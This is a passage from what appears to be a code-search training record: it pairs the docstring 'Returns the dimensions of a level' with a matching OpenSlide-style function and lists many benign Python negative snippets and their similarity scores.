keepdims=True))", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def get_scale():\r\n\r\n \r\n return 0.5", "def getDimensions():", "def displacement_mag(self):\n print(3284 * math.pow(self.concentration, -0.158))\n\n return 3284 * math.pow(self.concentration, -0.158)", "def gen_img_settings_quality(l):\n \n lhalf = 0.5*l\n \n ### sphere radius\n \n sphere_radius = 0.7\n #sphere_rgbcolor = [0.25,0.65,0.65]\n \n ### RESOLUTION\n \n img_widthpx = 1024\n img_heightpx = 1024\n\n ### includes and defaults\n\n povray_includes = [\"colors.inc\", \"textures.inc\", \"shapes.inc\"]\n povray_defaults = [vapory.Finish( 'ambient', 0.1,\n\t \t\t\t 'diffuse', 0.65,\n\t\t \t\t 'specular', 0.5,\n\t\t\t \t 'shininess', 0.53,\n\t\t\t\t 'opacity', 1.0)]\n\n\n ### light sources\n\n sun1 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', 'White')\n sun2 = vapory.LightSource([lhalf, lhalf, -1.01*lhalf], 'color', [0.7, 0.7, 0.7])\n\n ### background\n\n background = vapory.Background('color', [1,1,1])\n\n ### camera\n\n #povray_cam = vapory.Camera('angle', 75, 'location', [-15 , 15.0+0.5,15.0-0.25],'look_at', [0.25 , 15.0+0.5, 15.0-0.25])\n povray_cam = vapory.Camera('location', [lhalf, lhalf, -1.01*lhalf], 'look_at', [lhalf,lhalf,0], 'angle', 90)\n\n ### text\n # If desired include this in the povray_objects - array declared in the loop\n #text1 = vapory.Text( 'ttf', '\"timrom.ttf\"' ,'\"Division:\"', 0.01, 0.0, 'scale', [0.5,0.5,0.5],'rotate', [0,90,0], 'translate' , [0.0 , 15.0+2.75-1 , 15.0+1.5], vapory.Pigment('Black') ) \n\n ### render quality\n\n quality = 10\n \n return sphere_radius, img_widthpx, img_heightpx, povray_includes, povray_defaults, sun1, sun2, background, povray_cam, quality", "def flux_hack(self):\r\n return self.planes[1].galaxies[0].light_profiles[0].flux", "def magnification(w0, lambda0, s, f, M2=1):\n zR2 = z_rayleigh(w0, lambda0, M2)**2\n return f/np.sqrt((s+f)**2+zR2)", "def getimgs():", "def zoom(self):\n return self.container['zoom']", "def M(self):\n return self._properties['M']", "def magnitude(frame):\n sobelx = lambda im: cv2.Sobel(im, cv2.CV_64F, 1, 0, ksize=3)\n sobely = lambda im: cv2.Sobel(im, cv2.CV_64F, 0, 1, ksize=3)\n dxabs = cv2.convertScaleAbs(sobelx(frame))\n dyabs = cv2.convertScaleAbs(sobely(frame))\n\n return cv2.addWeighted(dxabs, 0.5, dyabs, 0.5, 0)", "def get_disp_lims():\n\n return [[0., 10.], [0., 20.], [0., 1./3.]]", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def zoom(self):\n return self['zoom']", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def getMeasures():", "def _get_synthesis_size(self, lvl):\n lvl_img = self.target_pyramid[lvl]\n h, w = lvl_img.shape[-2:]\n h, w = int(h * self.scale_factor[0]), int(w * self.scale_factor[1])\n return h, w", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def getLevels():", "def measurements(m_list):\n def area(a_list):\n return float(a_list[0]) * float(a_list[len(a_list) - 1])\n\n def perimeter(a_list):\n return (float(a_list[0]) + float(a_list[len(a_list) - 1])) * 2\n\n description = 'Perimeter = ' + str(perimeter(m_list)) + ' Area = ' + str(area(m_list))\n return description", "def GetScaleBlocks(width):\n\n rord=numpy.log10(abs(width)/2.0)\n nrord=rord % 1\n\n if nrord < numpy.log10(2):\n spc=0.2*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n elif nrord < numpy.log10(5):\n spc=0.5*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4]\n else:\n spc=pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=spc*5\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n\n if len(newspc) == 5:\n #labels=['0',None,\"%g\" % smallspc*2,None,\"%g\" % (smallspc*4)]\n labels=['0',None,None,None,\"%g\" % (smallspc*4)]\n else:\n labels=['0',None,None,None,None,\"%g\" % (smallspc*5)]\n\n temp_max=newspc[len(newspc)-1]\n start=temp_max\n for temp in numpy.arange(start,width-bigspc/2,bigspc):\n temp_max=temp_max+bigspc\n newspc.append(temp_max)\n labels.append(\"%g\" % temp_max)\n\n #start=temp_max\n #for temp in Numeric.arange(start,width-smallspc/2,smallspc):\n # labels.append(None)\n # temp_max=temp_max+smallspc \n # newspc.append(temp_max) \n\n return (numpy.array(newspc,numpy.float32),labels)", "def iterate_pyramid_levels(image: MultiscaleSpatialImage) -> Generator[DataArray, None, None]:\n for k in range(len(image)):\n scale_name = f\"scale{k}\"\n dt = image[scale_name]\n v = dt.values()\n assert len(v) == 1\n xdata = next(iter(v))\n yield xdata", "def _get_magnitudes(self):\n\n self.logging.debug('Get magnitudes ' )\n\n self.mags = {}\n\n steps = ['dbopen netmag', 'dbsubset orid != NULL']\n\n fields = ['orid', 'magid', 'magnitude', 'magtype',\n 'auth', 'uncertainty', 'lddate']\n\n for v in extract_from_db(self.db, steps, fields):\n orid = v.pop('orid')\n self.logging.debug('new mag for orid:%s' % orid)\n\n try:\n v['strmag'] = '%0.1f %s' % ( float(v['magnitude']), v['magtype'] )\n except:\n v['strmag'] = '-'\n\n if not orid in self.mags:\n self.mags[ orid ] = {}\n\n self.mags[ orid ][ v['magid'] ] = v", "def build_mipmaps(self, base: int = 0, max_level: int = 1000) -> None:\n if self._samples > 0:\n raise ValueError(\"Multisampled textures don't support mimpmaps\")\n\n gl.glActiveTexture(gl.GL_TEXTURE0 + self._ctx.default_texture_unit)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self._glo)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_BASE_LEVEL, base)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAX_LEVEL, max_level)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)", "def get_specs(mag : str, spec : str) -> list:\n if spec == \"F\":\n #if mag == \"20x\": max = 6\n #if mag == \"40x\": max = 8\n #if mag == \"60x\": max = 12\n max = 12\n specs = [\"F\"+str(i).zfill(3) for i in range(1,13)]\n if spec == \"Z\":\n specs = [\"Z\"+str(i).zfill(2) for i in range(1,8)]\n if spec == \"A\":\n specs = [\"A\"+str(i).zfill(2) for i in range(1,5)]\n return specs", "def display_multispectral_image(data, mask, sl, scale = 300):\n fig, axes = plt.subplots(2,2, figsize=(10,10))\n ax = axes.ravel()\n for k, ch in enumerate(chn_names):\n ax[k].imshow(data[:, :, sl, k].T + 300*mask[:,:,sl].T, cmap='gray', origin='lower')\n ax[k].set_title(ch)\n ax[k].set(xlabel=\"\")\n ax[k].axis('off')\n plt.suptitle('The multispectral MRI slice %d with the ROI mask' % sl) \n plt.tight_layout\n plt.show()", "def zoom(self):\n res = np.max(self.metadata[\"resolution\"])\n\n if self.atlas_name == \"allen_human_500um\":\n logger.debug(\n \"ATLAS: setting zoom manually for human atlas, atlas needs fixing\"\n )\n return 350\n else:\n return 40 / res", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def showscale(self):\n return self[\"showscale\"]", "def aspectRatios(self):\n return np.array([f.aspectRatio() for f in self])", "def test_mixing_ratio_dimensions():\n p = 998. * units.mbar\n e = 73.75 * units.hPa\n assert str(mixing_ratio(e, p).units) == 'dimensionless'", "def map_sim_property(**kwargs):\n\n GR = glo.global_results()\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n counter = 0\n fignum = 1\n if p.gal_index == 'all':\n\n for gal_index in GR.N_gal - np.arange(GR.N_gal) - 1:\n\n if counter == 0:\n fig, axes = plt.subplots(3, 3, figsize=(20,15))\n axs = [axes[0,0],axes[0,1],axes[0,2],axes[1,0],axes[1,1],axes[1,2],axes[2,0],axes[2,1],axes[2,2]]\n counter = 9\n\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type='simgas')\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n\n # Plot\n Rmax = max_scale/2\n ax1 = axs[9 - counter]\n if p.log:\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n if not p.log:\n map2D[map2D < p.vmin] = p.vmin/2\n map2D[map2D > p.vmax] = p.vmax\n im = ax1.imshow(map2D,\\\n extent=[-Rmax,Rmax,-Rmax,Rmax],vmin=p.vmin,cmap=p.cmap)\n fig.colorbar(im,shrink=0.8,ax=ax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n # Limit axes limits a bit to avoid area with no particles...\n ax1.set_xlim([-0.99*Rmax,0.99*Rmax])\n ax1.set_ylim([-0.99*Rmax,0.99*Rmax])\n if (p.prop == 'm') & (p.text == True):\n ax1.text(0.05,0.85,'M$_{gas}$=%.2eM$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.75,'SFR=%.2eM$_{\\odot}$/yr' % GR.SFR[gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n\n counter -= 1\n\n #if counter == 0:\n # ax1 = plt.subplots(1, 1)\n #cbar = fig.colorbar(im, ax=axes.ravel().tolist(), shrink=0.95, label=lab)\n # fig.colorbar(im,shrink=0.8,label=lab)\n\n if counter == 0 or gal_index == GR.N_gal-1:\n print('Saving in ' + p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format))\n # plt.tight_layout()\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/')\n plt.savefig(p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format), format=p.format, dpi=250, facecolor='w')\n fignum += 1\n\n else:\n if p.add:\n fig, ax1 = plt.gcf(), p.ax\n if not p.add:\n fig = plt.figure(figsize=(8,6))\n ax1 = fig.add_axes([0.1, 0.01, 0.8, 0.8]) \n ax1.axis('equal')\n\n gal_ob = gal.galaxy(GR=GR, gal_index=p.gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type=p.sim_type)\n if p.R_max:\n # Cut out square\n simgas = simgas[(np.abs(simgas.x) < p.R_max) & (np.abs(simgas.y) < p.R_max)]\n # Add bottom left corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = -p.R_max,-p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n # Add top right corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = p.R_max,p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n else:\n pass\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n print('Min and max of map: ',map2D.min(),map2D.max())\n #map2D[map2D < 1e4] = 1e6\n # Plot map\n if not p.R_max:\n p.R_max = max_scale/2\n if p.log: \n if not p.vmax: p.vmax = np.log10(map2D).max()\n if not p.vmin: p.vmin = np.log10(map2D).max() - 4\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n else:\n if not p.vmax: p.vmax = np.max(map2D)\n if not p.vmin: p.vmin = np.min(map2D) / 1e3\n map2D[map2D < p.vmin] = p.vmin #np.min(map2D[map2D > 0])\n map2D = np.flipud(map2D)\n\n im = ax1.imshow(map2D,\\\n extent=[-max_scale/2,max_scale/2,-max_scale/2,max_scale/2],vmin=p.vmin,vmax=p.vmax,cmap=p.cmap)\n # Limit axes limits a bit to avoid area with no particles...\n zoom = 1#/1.5\n ax1.set_xlim([-1/zoom * p.R_max,1/zoom * p.R_max])\n ax1.set_ylim([-1/zoom * p.R_max,1/zoom * p.R_max])\n if p.colorbar: \n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(im,cax=cax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n if (p.prop == 'm') & (p.text == True):\n simstar = aux.load_temp_file(gal_ob=gal_ob,data_type='simstar')\n ax1.text(0.05,0.92,'M$_{star}$=%.1e M$_{\\odot}$' % np.sum(simstar.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.86,'M$_{gas}$=%.1e M$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.80,'SFR=%.2f M$_{\\odot}$/yr' % GR.SFR[p.gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/') \n plt.savefig(p.d_plot + 'sim_data/map_%s_G%i.png' % (p.prop,p.gal_index), format=p.format, dpi=250, facecolor='w')\n\n if not p.colorbar: return(im)", "def estimate_phones(x):\n if x['mean_luminosity_km2'] > 5:\n return 10\n elif x['mean_luminosity_km2'] > 1:\n return 5\n else:\n return 1", "def level1Representation(self):\n rep = Level.load_rep('level/level1.txt')\n objects = {\n 'lever': {'l', 'm'},\n 'door': {'p', 'q'},\n 'player': {'j'},\n 'enemy': {'e'},\n 'object': {'a'},\n 'robot': {'r'}\n }\n toggle_objects = {\n 'l': {'p'},\n 'm': {'q'}\n }\n tile_map = {\n 'x': pygame.image.load('img/wall.png'),\n ',': pygame.image.load('img/dark_gray_tile.png'),\n '.': pygame.image.load('img/light_gray_tile.png'),\n '-': pygame.image.load('img/dark_red_tile.png')\n }\n level = Level(\n rep,\n objects,\n toggle_objects,\n self.width,\n self.height,\n Dimensions.width,\n Dimensions.height\n )\n class_map = {\n 'lever': Lever,\n 'robot': Robot,\n 'enemy': Enemy,\n 'player': MainCharacter,\n 'door': Door,\n 'object': Treasure\n }\n values = {\n 'l': {'image': 'img/lever_a_0.png', 'screen': self.screen},\n 'm': {'image': 'img/lever_b_0.png', 'screen': self.screen},\n 'p': {'toggled': False},\n 'q': {'toggled': False},\n 'j': {},\n 'e': {},\n 'a': {},\n 'r': {}\n }\n\n coords = level.coordinates(['x'])\n unwalkable = {x for k in coords for x in coords[k]}\n\n level1Dict = {\n 'levelIndex': 1,\n 'rep': rep,\n 'objects': objects,\n 'toggle_objects': toggle_objects,\n 'tile_map': tile_map,\n 'level': level,\n 'class_map': class_map,\n 'values': values,\n 'coords': coords,\n 'unwalkable': unwalkable,\n 'config_ai' : self.level1AI\n }\n return level1Dict" ]
[ "0.7798809", "0.6923862", "0.66853", "0.65677786", "0.62147903", "0.6124908", "0.61031574", "0.6090716", "0.6088541", "0.58556306", "0.5820038", "0.56304854", "0.5626129", "0.56065404", "0.5559378", "0.54275894", "0.54266506", "0.5425498", "0.53985816", "0.53818405", "0.5253527", "0.5240948", "0.51987", "0.5192708", "0.51578003", "0.5132643", "0.5086026", "0.50854266", "0.50435466", "0.49884495", "0.49748033", "0.49724284", "0.49649274", "0.49234444", "0.49214375", "0.4913182", "0.48756644", "0.48746878", "0.4873955", "0.48696244", "0.48639742", "0.48207143", "0.48145312", "0.48098424", "0.48051", "0.47956938", "0.47950175", "0.4786803", "0.47814497", "0.47762296", "0.47553313", "0.4736325", "0.47307462", "0.47229123", "0.47222373", "0.47176754", "0.47176754", "0.47077367", "0.4687485", "0.46854198", "0.46821135", "0.46702373", "0.4668277", "0.4662483", "0.46614853", "0.46583644", "0.4652125", "0.4649919", "0.4648449", "0.46462983", "0.4635233", "0.4633659", "0.46312585", "0.46309984", "0.46293157", "0.46224788", "0.46219036", "0.4620888", "0.46195853", "0.46154198", "0.46124825", "0.46076936", "0.46060538", "0.46059576", "0.46040177", "0.46032664", "0.45972878", "0.45959753", "0.45950916", "0.45939964", "0.45928487", "0.45913425", "0.45872703", "0.4585672", "0.4580005", "0.4579921", "0.45737037", "0.45713294", "0.4566695", "0.45614827" ]
0.78430814
0
Returns the dimensions of a level
def get_level_size(slide, level): return slide.level_dimensions[level]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimensions():", "def getDimensions():", "def _get_ndim(self):\n return len(self.level_shapes[0])", "def depth(self):\n return _libsbml.Dimensions_depth(self)", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def get_map_size(level):\n if level < 5:\n return 5, 5\n if level < 70:\n return 10, 10\n if level < 150:\n return 25, 25\n return 50, 50", "def get_dim(self, name):\n return len(self.root_group.dimensions[name])", "def get_dimension_length(self):\n pass", "def dimension(self):", "def dimensions(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return var.dimensions", "def dimension(self):\n\t\treturn self.d", "def dims(self):\n return self[0].dims", "def getDepth(self):\n return _libsbml.Dimensions_getDepth(self)", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? here / in varset?", "def levshape(self) -> Shape:\n return tuple(len(x) for x in self.levels)", "def size(self, level=None):\n level = level or self.local_variables\n names = {}\n while level:\n for name in level.bindings:\n names[name] = 1\n level = level.parent\n return len(names)", "def getDimensions(unique_name=None):", "def dimensions(self):\n return self.index.names", "def N(self):\n return self._dimensions", "def dimension(self) -> float:\n return self._dimensions", "def getDimensions(self):\n\t\tprint \"Returning\",self.x,self.y,self.slicesPerTimepoint\n\t\treturn (self.x, self.y, self.slicesPerTimepoint)", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def n_levels(self):\n return len(self.scales)", "def getLevels():", "def get_dim():\n return (Settings.width, Settings.height)", "def dims(self):\n return tuple(d for d in (v.states for v in self.__vars)) if len(self.__vars) else (1,)", "def get_dimension(self):\n return", "def dim(self):\n\t\treturn self.D", "def getDimensions(self):\n\ttop = self.getTop()\n\tleft = self.getLeft()\n\twidth = self.getWidth()\n\theight = self.getHeight()\n\treturn top, left, width, height", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[Sequence['outputs.MetricDimensionResponse']]:\n return pulumi.get(self, \"dimensions\")", "def dimensions(self) -> Optional[Sequence['outputs.MetricDimensionResponse']]:\n return pulumi.get(self, \"dimensions\")", "def get_dimensions(n=1):\n if n <= len(self._dimensions): return self._dimensions[n-1]", "def getDimensionality(self):\n return self.dimensionality", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def get_dim(self):\n return self.dim", "def level_size(level):\n return level.count('\\n') + 1, level.find('\\n')", "def dims(self) -> tuple[str, str]:\n # if self.dim0 is not None:\n return self.y_dim, self.x_dim", "def dim(self):\n return self._d", "def get_dimensionality(self) -> int:\n return self.dimensionality", "def getNumDimensions(self):\n return len(self.di.keys())", "def dimensions(self):\n d=dict()\n d['div'] = (self._div)\n d['var'] = len(self.used_variables)\n d['x'] = self.Xdim\n d['y'] = self.Ydim\n d['lev'] = self.lev\n d['dir'] = self._nb_dir\n return(d)", "def num_dims(self):\n return self.h5['{}/{}'.format(SETTINGS, N_DIMS_STR)][()]", "def getDimensions(self):\n return self._majax, self._minax, self._pa", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def level_width(cls, level):\n if not 0 <= level <= cls.max_level:\n raise ValueError(\"level must be between 0 and {}\".format(cls.max_level))\n return 2 ** (cls.max_level - level)", "def getDimensionality(self):\n dimensionality = self._distribution.returnDimensionality()\n return dimensionality", "def test_level_width_1(self):\n root = Node(0)\n root.add(1)\n root.add(2)\n root.add(3)\n root.children[0].add(4)\n root.children[2].add(5)\n self.assertEqual(level_width(root), [1, 3, 2])", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def get_dimension_width(self):\n pass", "def dimension(self):\n return self._dim", "def get_dim(self):\n return self._dim", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def dimensions( cls, value, typeCode=None ):\n return value.shape", "def getLevel(self, *args):\n return _libsbml.LayoutExtension_getLevel(self, *args)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_dimensions(self, fieldname=None):\n if fieldname is None:\n dims = self._dims.keys()\n else:\n dims = self.read_field(fieldname).dimensions.keys()\n return tuple(dims)", "def dimension_count(self):\n return self._dimensionCount", "def _get_level_width(air_pressure_bounds, ref_lev, ref_zg):\n ref_lev = ref_lev.compressed()\n ref_zg = ref_zg.compressed()\n if len(ref_lev) < 2:\n return np.full(air_pressure_bounds.shape[0], np.nan)\n func = interp1d(ref_lev, ref_zg, kind='cubic', fill_value='extrapolate')\n level_widths = []\n for bounds in air_pressure_bounds:\n level_width = abs(func(bounds[0]) - func(bounds[1]))\n level_widths.append(level_width)\n return np.array(level_widths)", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def Nlevels(self):\n return self._nlevels", "def dim(self) -> int:", "def dim(self):\n return self.__dim__", "def n_levels(self):\n return self.primary_header['Number of levels']", "def dim(self):\n return self._dim", "def dim(self):\n raise NotImplementedError", "def dim(self):\n return self._domain.dim", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def get_dimensions(self, obj):\n return str(obj.dimensions)", "def zoomlevels(self):\n return self._bboxes[0][1] #TODO: merge all coverages", "def get_dimension(self):\n return self._dimension", "def n_z(self, level):\n resolution = self.resolution(level)\n return (self.z_extent // resolution + 63) // 64", "def getdim(self):\n return round(self.w() / self.c)", "def get_dimensions(self):\n return self.lon_arr.shape", "def getDimension(unique_name):", "def getDimension(unique_name):", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def take_max_level(self):\n level = 0\n for k, v in self.d.items():\n level = max(level, len(k.split(\":\")))\n return level", "def get_number_of_atmos_levels(description):\n if description == \"none\":\n return \"0\", \"0\"\n elif re.search(\"levels\", description):\n match = re.search(\"(?P<nl>\\d+)\\s?(levels|vertical levels)\", description)\n nlevs = match.groupdict()[\"nl\"]\n if int(nlevs) > 49: nlas = \"20\"\n else: nlas = \"10\"\n return nlevs, nlas\n else:\n return \"40\", \"20\"", "def GetDimensions(self, p_int=..., p_int=..., p_int=..., *args, **kwargs):\n ...", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def nlevels(self) -> int:\n return len(self._levels)", "def get_dimensions(self, labware_id: str) -> Dimensions:\n definition = self.get_definition(labware_id)\n dims = definition.dimensions\n\n return Dimensions(\n x=dims.xDimension,\n y=dims.yDimension,\n z=dims.zDimension,\n )", "def depths(self):\n return self._origin.depth", "def depths(self):\n return self._origin.depth", "def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]:\n return pulumi.get(self, \"dimensions\")", "def dimension_size(self):\n return self._dim", "def listdimension(self):\n return list(self.dimensions.keys())", "def _get_tensor_depth(x):\n return np.prod(x.get_shape().as_list()[1:])", "def test_level_width_2(self):\n root = Node(0)\n root.add(1)\n root.children[0].add(2)\n root.children[0].add(3)\n root.children[0].children[0].add(4)\n self.assertEqual(level_width(root), [1, 1, 2, 1])", "def calc_dimension(your_mesh):\n minx = your_mesh.x.min()\n maxx = your_mesh.x.max()\n miny = your_mesh.y.min()\n maxy = your_mesh.y.max()\n minz = your_mesh.z.min()\n maxz = your_mesh.z.max()\n return minx, maxx, miny, maxy, minz, maxz", "def get_dimension(self) -> int:\n return self.embedder.get_dimension()", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def get_num_levels(self):\n return len(self._Psi)" ]
[ "0.7337827", "0.7250944", "0.7064121", "0.7035364", "0.6847221", "0.67899704", "0.67407316", "0.6720339", "0.66824", "0.66605484", "0.66371953", "0.6546749", "0.6472022", "0.6469843", "0.64618737", "0.6444262", "0.6423922", "0.6412058", "0.6396843", "0.6379703", "0.6365779", "0.63647896", "0.63589346", "0.6353814", "0.63318825", "0.63226545", "0.62823856", "0.6281621", "0.62745583", "0.6257524", "0.6257524", "0.6257524", "0.6257524", "0.6256068", "0.6256068", "0.62414914", "0.6225913", "0.621027", "0.6202955", "0.6202067", "0.6195175", "0.61944956", "0.6166258", "0.6164681", "0.6154628", "0.61441064", "0.61437184", "0.6122517", "0.6114838", "0.61103433", "0.6103652", "0.61011976", "0.6093304", "0.60926634", "0.60839534", "0.60815245", "0.60686684", "0.60616255", "0.6061368", "0.60609555", "0.60455275", "0.6041046", "0.604075", "0.6037806", "0.60347426", "0.6029926", "0.60267496", "0.60242796", "0.6024051", "0.6018935", "0.60140216", "0.60049504", "0.6002765", "0.5997771", "0.59968007", "0.598715", "0.59869015", "0.5979981", "0.5979981", "0.5979844", "0.59772533", "0.59749603", "0.5972986", "0.597139", "0.597139", "0.597139", "0.597139", "0.59711415", "0.5969911", "0.5969136", "0.5969136", "0.5961064", "0.5957652", "0.5955843", "0.5934096", "0.593292", "0.5928127", "0.592379", "0.59115964", "0.59108734" ]
0.8075793
0
Returns the magnification at a particular level
def get_level_mag(slide, level): return level_mags(slide)[level]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def get_mag(self):\n raise NotImplementedError", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_level_size(slide, level):\n return slide.level_dimensions[level]", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def detail(self):\n return self.uniform(\"detail\",\n self.img_scale * .05,\n self.img_scale * .2)", "def mag(self) -> complex:\n return self.major_extent", "def resolution(self, 